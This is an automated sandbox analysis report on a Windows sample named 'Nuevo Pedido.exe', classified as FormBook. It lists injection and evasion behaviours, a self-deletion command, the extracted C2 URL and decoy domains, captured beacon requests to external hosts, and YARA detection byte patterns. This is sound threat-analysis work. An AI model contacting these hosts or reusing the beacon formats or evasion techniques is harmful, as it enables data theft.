Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name:Nuevo Pedido.exe
Analysis ID:528617
MD5:159c46c59cd8ecb7a2bce707de1bc370
SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Nuevo Pedido.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
    • Nuevo Pedido.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Nuevo Pedido.exe MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6420 cmdline: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.Nuevo Pedido.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.Nuevo Pedido.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.Nuevo Pedido.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          3.0.Nuevo Pedido.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 18 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Nuevo Pedido.exeVirustotal: Detection: 32%Perma Link
            Source: Nuevo Pedido.exeReversingLabs: Detection: 33%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Nuevo Pedido.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop edi3_2_00415660
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop esi3_2_004157D8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 4x nop then pop esi3_2_004157AA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi16_2_00615660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi16_2_006157D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi16_2_006157AA

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exeDomain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.tremblock.com
            Source: C:\Windows\explorer.exeDomain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exeDomain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exeDomain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.232.250.147 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.53 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.spoiledzone.com/udeh/
            Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:10:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 14:11:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmpString found in binary or memory: http://www.rcepjobs.com
            Source: unknownDNS traffic detected: queries for: www.tremblock.com
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1Host: www.tremblock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1Host: www.rcepjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1Host: www.downingmunroe.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1Host: www.thejohnmatt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1Host: www.onlinedatingthaiweb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
